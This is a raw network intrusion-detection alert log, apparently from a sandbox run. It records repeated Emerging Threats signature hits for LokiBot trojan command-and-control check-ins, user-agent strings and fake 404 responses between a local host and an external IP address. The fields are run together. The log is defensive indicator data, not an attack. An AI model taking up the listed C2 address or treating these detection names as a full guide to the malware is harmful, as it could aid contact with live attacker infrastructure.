                                            12/02/20-11:53:26.882936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.645.144.3.234
                                            12/02/20-11:53:26.882936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.645.144.3.234
                                            12/02/20-11:53:26.882936TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.645.144.3.234
                                            12/02/20-11:53:26.882936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.645.144.3.234
                                            12/02/20-11:53:27.009886TCP2025483ET TROJAN LokiBot Fake 404 Response804983045.144.3.234192.168.2.6
                                            12/02/20-11:53:27.289891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.645.144.3.234
                                            12/02/20-11:53:27.289891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.645.144.3.234
                                            12/02/20-11:53:27.289891TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.645.144.3.234
                                            12/02/20-11:53:27.289891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.645.144.3.234
                                            12/02/20-11:53:27.425017TCP2025483ET TROJAN LokiBot Fake 404 Response804983245.144.3.234192.168.2.6
                                            12/02/20-11:53:27.719155TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.645.144.3.234
                                            12/02/20-11:53:27.719155TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.645.144.3.234
                                            12/02/20-11:53:27.719155TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.645.144.3.234
                                            12/02/20-11:53:27.719155TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.645.144.3.234
                                            12/02/20-11:53:27.845240TCP2025483ET TROJAN LokiBot Fake 404 Response804983345.144.3.234192.168.2.6
                                            12/02/20-11:53:28.159277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.645.144.3.234
                                            12/02/20-11:53:28.159277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.645.144.3.234
                                            12/02/20-11:53:28.159277TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.645.144.3.234
                                            12/02/20-11:53:28.159277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.645.144.3.234
                                            12/02/20-11:53:28.285478TCP2025483ET TROJAN LokiBot Fake 404 Response804983545.144.3.234192.168.2.6
                                            12/02/20-11:53:28.578865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.645.144.3.234
                                            12/02/20-11:53:28.578865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.645.144.3.234
                                            12/02/20-11:53:28.578865TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.645.144.3.234
                                            12/02/20-11:53:28.578865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.645.144.3.234
                                            12/02/20-11:53:28.707381TCP2025483ET TROJAN LokiBot Fake 404 Response804983745.144.3.234192.168.2.6
                                            12/02/20-11:53:28.995226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.645.144.3.234
                                            12/02/20-11:53:28.995226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.645.144.3.234
                                            12/02/20-11:53:28.995226TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.645.144.3.234
                                            12/02/20-11:53:28.995226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.645.144.3.234
                                            12/02/20-11:53:29.124566TCP2025483ET TROJAN LokiBot Fake 404 Response804983845.144.3.234192.168.2.6
                                            12/02/20-11:53:29.419859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.645.144.3.234
                                            12/02/20-11:53:29.419859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.645.144.3.234
                                            12/02/20-11:53:29.419859TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.645.144.3.234
                                            12/02/20-11:53:29.419859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.645.144.3.234
                                            12/02/20-11:53:29.546130TCP2025483ET TROJAN LokiBot Fake 404 Response804984045.144.3.234192.168.2.6
                                            12/02/20-11:53:29.835346TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.645.144.3.234
                                            12/02/20-11:53:29.835346TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.645.144.3.234
                                            12/02/20-11:53:29.835346TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.645.144.3.234
                                            12/02/20-11:53:29.835346TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.645.144.3.234
                                            12/02/20-11:53:29.961003TCP2025483ET TROJAN LokiBot Fake 404 Response804984145.144.3.234192.168.2.6
                                            12/02/20-11:53:30.245196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.645.144.3.234
                                            12/02/20-11:53:30.245196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.645.144.3.234
                                            12/02/20-11:53:30.245196TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.645.144.3.234
                                            12/02/20-11:53:30.245196TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.645.144.3.234
                                            12/02/20-11:53:30.371175TCP2025483ET TROJAN LokiBot Fake 404 Response804984345.144.3.234192.168.2.6
                                            12/02/20-11:53:30.625790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.645.144.3.234
                                            12/02/20-11:53:30.625790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.645.144.3.234
                                            12/02/20-11:53:30.625790TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.645.144.3.234
                                            12/02/20-11:53:30.625790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.645.144.3.234
                                            12/02/20-11:53:30.751743TCP2025483ET TROJAN LokiBot Fake 404 Response804984445.144.3.234192.168.2.6
                                            12/02/20-11:53:31.037565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.645.144.3.234
                                            12/02/20-11:53:31.037565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.645.144.3.234
                                            12/02/20-11:53:31.037565TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.645.144.3.234
                                            12/02/20-11:53:31.037565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.645.144.3.234
                                            12/02/20-11:53:31.164427TCP2025483ET TROJAN LokiBot Fake 404 Response804984545.144.3.234192.168.2.6
                                            12/02/20-11:53:31.503457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.645.144.3.234
                                            12/02/20-11:53:31.503457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.645.144.3.234
                                            12/02/20-11:53:31.503457TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.645.144.3.234
                                            12/02/20-11:53:31.503457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.645.144.3.234
                                            12/02/20-11:53:31.630879TCP2025483ET TROJAN LokiBot Fake 404 Response804984645.144.3.234192.168.2.6
                                            12/02/20-11:53:31.875175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.645.144.3.234
                                            12/02/20-11:53:31.875175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.645.144.3.234
                                            12/02/20-11:53:31.875175TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.645.144.3.234
                                            12/02/20-11:53:31.875175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.2.645.144.3.234
                                            12/02/20-11:53:32.010010TCP2025483ET TROJAN LokiBot Fake 404 Response804984745.144.3.234192.168.2.6
                                            12/02/20-11:53:32.306006TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.645.144.3.234
                                            12/02/20-11:53:32.306006TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.645.144.3.234
                                            12/02/20-11:53:32.306006TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.645.144.3.234
                                            12/02/20-11:53:32.306006TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.645.144.3.234
                                            12/02/20-11:53:32.430725TCP2025483ET TROJAN LokiBot Fake 404 Response804984845.144.3.234192.168.2.6
                                            12/02/20-11:53:32.677638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.645.144.3.234
                                            12/02/20-11:53:32.677638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.645.144.3.234
                                            12/02/20-11:53:32.677638TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.645.144.3.234
                                            12/02/20-11:53:32.677638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.2.645.144.3.234
                                            12/02/20-11:53:32.804539TCP2025483ET TROJAN LokiBot Fake 404 Response804984945.144.3.234192.168.2.6
                                            12/02/20-11:53:33.088547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.645.144.3.234
                                            12/02/20-11:53:33.088547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.645.144.3.234
                                            12/02/20-11:53:33.088547TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.645.144.3.234
                                            12/02/20-11:53:33.088547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.645.144.3.234
                                            12/02/20-11:53:33.217117TCP2025483ET TROJAN LokiBot Fake 404 Response804985045.144.3.234192.168.2.6
                                            12/02/20-11:53:33.527613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.645.144.3.234
                                            12/02/20-11:53:33.527613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.645.144.3.234
                                            12/02/20-11:53:33.527613TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.645.144.3.234
                                            12/02/20-11:53:33.527613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.645.144.3.234
                                            12/02/20-11:53:33.653286TCP2025483ET TROJAN LokiBot Fake 404 Response804985145.144.3.234192.168.2.6
                                            12/02/20-11:53:33.937055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.645.144.3.234
                                            12/02/20-11:53:33.937055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.645.144.3.234
                                            12/02/20-11:53:33.937055TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.645.144.3.234
                                            12/02/20-11:53:33.937055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.645.144.3.234
                                            12/02/20-11:53:34.063106TCP2025483ET TROJAN LokiBot Fake 404 Response804985345.144.3.234192.168.2.6
                                            12/02/20-11:53:34.366690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.645.144.3.234
                                            12/02/20-11:53:34.366690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.645.144.3.234
                                            12/02/20-11:53:34.366690TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.645.144.3.234
                                            12/02/20-11:53:34.366690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.2.645.144.3.234
                                            12/02/20-11:53:34.511688TCP2025483ET TROJAN LokiBot Fake 404 Response804985445.144.3.234192.168.2.6
                                            12/02/20-11:53:34.808234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.645.144.3.234
                                            12/02/20-11:53:34.808234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.645.144.3.234
                                            12/02/20-11:53:34.808234TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.645.144.3.234
                                            12/02/20-11:53:34.808234TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.645.144.3.234
                                            12/02/20-11:53:34.935148TCP2025483ET TROJAN LokiBot Fake 404 Response804985545.144.3.234192.168.2.6
                                            12/02/20-11:53:35.232013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.645.144.3.234
                                            12/02/20-11:53:35.232013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.645.144.3.234
                                            12/02/20-11:53:35.232013TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.645.144.3.234
                                            12/02/20-11:53:35.232013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.645.144.3.234
                                            12/02/20-11:53:35.356287TCP2025483ET TROJAN LokiBot Fake 404 Response804985645.144.3.234192.168.2.6
                                            12/02/20-11:53:35.626805TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.645.144.3.234
                                            12/02/20-11:53:35.626805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.645.144.3.234
                                            12/02/20-11:53:35.626805TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.645.144.3.234
                                            12/02/20-11:53:35.626805TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.645.144.3.234
                                            12/02/20-11:53:35.766350TCP2025483ET TROJAN LokiBot Fake 404 Response804985745.144.3.234192.168.2.6
                                            12/02/20-11:53:36.022090TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.645.144.3.234
                                            12/02/20-11:53:36.022090TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.645.144.3.234
                                            12/02/20-11:53:36.022090TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.645.144.3.234
                                            12/02/20-11:53:36.022090TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.645.144.3.234
                                            12/02/20-11:53:36.150350TCP2025483ET TROJAN LokiBot Fake 404 Response804985845.144.3.234192.168.2.6
                                            12/02/20-11:53:36.435768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.645.144.3.234
                                            12/02/20-11:53:36.435768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.645.144.3.234
                                            12/02/20-11:53:36.435768TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.645.144.3.234
                                            12/02/20-11:53:36.435768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.645.144.3.234
                                            12/02/20-11:53:36.561460TCP2025483ET TROJAN LokiBot Fake 404 Response804985945.144.3.234192.168.2.6
                                            12/02/20-11:53:36.878453TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.645.144.3.234
                                            12/02/20-11:53:36.878453TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.645.144.3.234
                                            12/02/20-11:53:36.878453TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.645.144.3.234
                                            12/02/20-11:53:36.878453TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.645.144.3.234
                                            12/02/20-11:53:37.006664TCP2025483ET TROJAN LokiBot Fake 404 Response804986045.144.3.234192.168.2.6
                                            12/02/20-11:53:37.316130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.645.144.3.234
                                            12/02/20-11:53:37.316130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.645.144.3.234
                                            12/02/20-11:53:37.316130TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.645.144.3.234
                                            12/02/20-11:53:37.316130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.645.144.3.234
                                            12/02/20-11:53:37.454833TCP2025483ET TROJAN LokiBot Fake 404 Response804986145.144.3.234192.168.2.6
                                            12/02/20-11:53:37.757546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.645.144.3.234
                                            12/02/20-11:53:37.757546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.645.144.3.234
                                            12/02/20-11:53:37.757546TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.645.144.3.234
                                            12/02/20-11:53:37.757546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.645.144.3.234
                                            12/02/20-11:53:37.885756TCP2025483ET TROJAN LokiBot Fake 404 Response804986245.144.3.234192.168.2.6
                                            12/02/20-11:53:38.181313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.645.144.3.234
                                            12/02/20-11:53:38.181313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.645.144.3.234
                                            12/02/20-11:53:38.181313TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.645.144.3.234
                                            12/02/20-11:53:38.181313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.645.144.3.234
                                            12/02/20-11:53:38.308756TCP2025483ET TROJAN LokiBot Fake 404 Response804986345.144.3.234192.168.2.6
                                            12/02/20-11:53:38.602223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.645.144.3.234
                                            12/02/20-11:53:38.602223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.645.144.3.234
                                            12/02/20-11:53:38.602223TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.645.144.3.234
                                            12/02/20-11:53:38.602223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.645.144.3.234
                                            12/02/20-11:53:38.728998TCP2025483ET TROJAN LokiBot Fake 404 Response804986445.144.3.234192.168.2.6
                                            12/02/20-11:53:38.961339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.645.144.3.234
                                            12/02/20-11:53:38.961339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.645.144.3.234
                                            12/02/20-11:53:38.961339TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.645.144.3.234
                                            12/02/20-11:53:38.961339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.645.144.3.234
                                            12/02/20-11:53:39.091333TCP2025483ET TROJAN LokiBot Fake 404 Response804986645.144.3.234192.168.2.6
                                            12/02/20-11:53:39.390389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.517182TCP2025483ET TROJAN LokiBot Fake 404 Response804986745.144.3.234192.168.2.6
                                            12/02/20-11:53:39.815212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.940460TCP2025483ET TROJAN LokiBot Fake 404 Response804986945.144.3.234192.168.2.6
                                            12/02/20-11:53:40.305916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.432231TCP2025483ET TROJAN LokiBot Fake 404 Response804987045.144.3.234192.168.2.6
                                            12/02/20-11:53:40.669920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.669920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.669920TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.669920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.795723TCP2025483ET TROJAN LokiBot Fake 404 Response804987145.144.3.234192.168.2.6
                                            12/02/20-11:53:41.124374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.271989TCP2025483ET TROJAN LokiBot Fake 404 Response804987245.144.3.234192.168.2.6
                                            12/02/20-11:53:41.506474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.630264TCP2025483ET TROJAN LokiBot Fake 404 Response804987345.144.3.234192.168.2.6
                                            12/02/20-11:53:41.908530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.645.144.3.234
                                            12/02/20-11:53:42.037556TCP2025483ET TROJAN LokiBot Fake 404 Response804987445.144.3.234192.168.2.6
                                            12/02/20-11:53:42.363986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.645.144.3.234
                                            12/02/20-11:53:44.446561TCP2025483ET TROJAN LokiBot Fake 404 Response804987545.144.3.234192.168.2.6
                                            12/02/20-11:53:44.731017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.857262TCP2025483ET TROJAN LokiBot Fake 404 Response804987645.144.3.234192.168.2.6
                                            12/02/20-11:53:45.110818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.239439TCP2025483ET TROJAN LokiBot Fake 404 Response804987745.144.3.234192.168.2.6
                                            12/02/20-11:53:45.530515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.675242TCP2025483ET TROJAN LokiBot Fake 404 Response804987845.144.3.234192.168.2.6
                                            12/02/20-11:53:45.971010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.645.144.3.234
                                            12/02/20-11:53:46.096855TCP2025483ET TROJAN LokiBot Fake 404 Response804987945.144.3.234192.168.2.6
                                            12/02/20-11:53:46.394584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.522598TCP2025483ET TROJAN LokiBot Fake 404 Response804988045.144.3.234192.168.2.6
                                            12/02/20-11:53:46.812717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.941850TCP2025483ET TROJAN LokiBot Fake 404 Response804988145.144.3.234192.168.2.6
                                            12/02/20-11:53:47.221801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.351135TCP2025483ET TROJAN LokiBot Fake 404 Response804988245.144.3.234192.168.2.6
                                            12/02/20-11:53:47.662367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.791693TCP2025483ET TROJAN LokiBot Fake 404 Response804988345.144.3.234192.168.2.6
                                            12/02/20-11:53:48.086474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.211005TCP2025483ET TROJAN LokiBot Fake 404 Response804988445.144.3.234192.168.2.6
                                            12/02/20-11:53:48.497369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.645.144.3.234
